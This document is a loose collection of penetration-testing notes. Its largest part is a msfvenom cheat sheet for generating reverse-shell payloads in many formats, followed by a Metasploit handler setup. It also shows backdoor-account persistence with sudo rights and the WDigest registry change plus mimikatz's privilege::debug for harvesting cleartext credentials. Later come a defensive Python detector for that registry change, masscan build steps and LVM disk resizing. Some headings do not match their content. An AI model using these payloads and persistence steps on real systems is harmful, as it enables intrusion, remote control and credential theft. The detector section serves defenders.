Persistence

Add a user, set the password non-interactively, and add it to the sudo group
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
Move the home directory: sudo usermod -d /path/to/new/home -m username

File download

tar -cvf log.tar log2012.log       archive only, no compression
tar -zcvf log.tar.gz log2012.log   archive, then compress with gzip
tar -jcvf log.tar.bz2 log2012.log  archive, then compress with bzip2

python -m SimpleHTTPServer 8001    (Python 2; on Python 3 the equivalent is python3 -m http.server 8001)

<?php
// Check whether the request body carried a POST field named AAA
if (isset($_POST["AAA"])) {
    echo "ISSET";
} else {
    echo "UNSET";
}

A form has to be constructed for this:
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

Or modify the request directly in Burp, but the header Content-Type: application/x-www-form-urlencoded is required, otherwise $_POST stays empty.

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed, the following command will execute your handler: 'msfconsole -L -r '

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
Use the 32- or 64-bit binary that matches the operating system
privilege::debug
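From the defender's side, the registry change above (UseLogonCredential set to 1 under the WDigest key, which makes LSASS keep cleartext credentials in memory again) is the thing to alert on. The following is an added example, not part of the original notes: it scans constructed process-creation log lines for reg.exe or PowerShell commands that write a non-zero UseLogonCredential, and ignores writes of 0, which are the hardening direction. The log line layout (ts host= user= cmd=) is an assumption made for this example only.

```python
import re
from typing import Dict, List, Optional

# Constructed sample log lines (not real telemetry); the layout is an assumption.
SAMPLE_LOG = """\
2024-03-01T09:12:01Z host=WS01 user=alice cmd="reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1"
2024-03-01T09:15:44Z host=WS02 user=bob cmd="reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f"
2024-03-01T09:20:10Z host=WS03 user=carol cmd="reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
2024-03-01T09:31:07Z host=WS04 user=dave cmd="powershell Set-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -Name UseLogonCredential -Value 1"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$')
WDIGEST_RE = re.compile(r"securityproviders\\+wdigest", re.I)
# reg.exe syntax (/v NAME ... /d VALUE) and PowerShell syntax (-Name NAME ... -Value VALUE)
VALUE_RES = [
    re.compile(r"/v\s+UseLogonCredential\b.*?/d\s+(0x[0-9a-f]+|\d+)", re.I),
    re.compile(r"-Name\s+UseLogonCredential\b.*?-Value\s+(0x[0-9a-f]+|\d+)", re.I),
]

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed log line into its fields; None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def wdigest_value(cmd: str) -> Optional[int]:
    """Return the UseLogonCredential value a command writes, or None if it does not write it."""
    if not WDIGEST_RE.search(cmd):
        return None
    for rx in VALUE_RES:
        m = rx.search(cmd)
        if m:
            raw = m.group(1).lower()
            return int(raw, 16) if raw.startswith("0x") else int(raw, 10)
    return None

def find_wdigest_enables(log_text: str) -> List[Dict[str, str]]:
    """Flag only writes that set UseLogonCredential to a non-zero value (credential caching on)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        val = wdigest_value(rec["cmd"])
        if val is not None and val != 0:
            hits.append({"ts": rec["ts"], "host": rec["host"], "user": rec["user"], "value": str(val)})
    return hits

if __name__ == "__main__":
    for h in find_wdigest_enables(SAMPLE_LOG):
        print(f"ALERT {h['ts']} {h['host']} {h['user']} set UseLogonCredential={h['value']}")
```

Running it on the constructed log reports WS01 and WS04 and stays quiet on WS02, whose write of 0 is the fix rather than the problem.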

masscan repository: https://github.com/robertdavidgraham/masscan/

After downloading the package, enter the masscan-master directory
Install MinGW (short for Minimalist GNU for Windows)
Add MinGW's bin directory to PATH
Run mingw32-make
An error appears: stdio.h cannot be found
Open the Makefile
Add the part marked in bold (between ** **) at the following location
DEFINES =
CFLAGS = -g -ggdb $(FLAGS2) $(INCLUDES) $(DEFINES) -Wall -O3 ** --target=i686-pc-mingw32 **
#CFLAGS = -g -ggdb -march=i686 -Ivs10/include $(DEFINES) -Wall -O3
.SUFFIXES: .c .cpp
Continuing the build fails with pthread.h not found
Download pthreads and copy pthread.h from its include directory into the include directory of the MinGW installation
Continuing the build then fails with unresolved symbols like xxx@16; append -lws2_32 -liphlpapi at the end of the link step in the Makefile
ws2_32 is winsock32, and iphlpapi provides some very useful APIs for retrieving network information
https://msdn.microsoft.com/en-us/library/ms923804.aspx

First enlarge the virtual machine's disk

fdisk /dev/sda   operate on the partition table of /dev/sda
p                list the existing partitions (I see two: /dev/sda1 /dev/sda2)
n                add a new partition
p                partition type: choose primary
                 choose partition number 3 (1 and 2 are already in use, see above)
Enter            accept the default (first sector)
Enter            accept the default (last sector)
t                change the partition type
                 select partition 3
8e               change it to Linux LVM (8e is the LVM type code)
w                write the partition table
q                done, exit fdisk
Reboot
mkfs.ext3 /dev/sda3
3. Add the new LVM physical volume to the existing volume group to grow it
lvm                                          enter LVM management
lvm> pvcreate /dev/sda3                      initialize the partition just created; required
lvm> vgextend debian-vg /dev/sda3            add the initialized partition to the volume group
lvm> lvextend -L +29.9G /dev/debian-vg/root  extend the existing logical volume
lvm> pvdisplay                               show volume capacity; you will now see a much larger volume
lvm> quit                                    exit
The above only grows the volume; the filesystem itself is grown with the following command:
resize2fs /dev/debian-vg/root
Reboot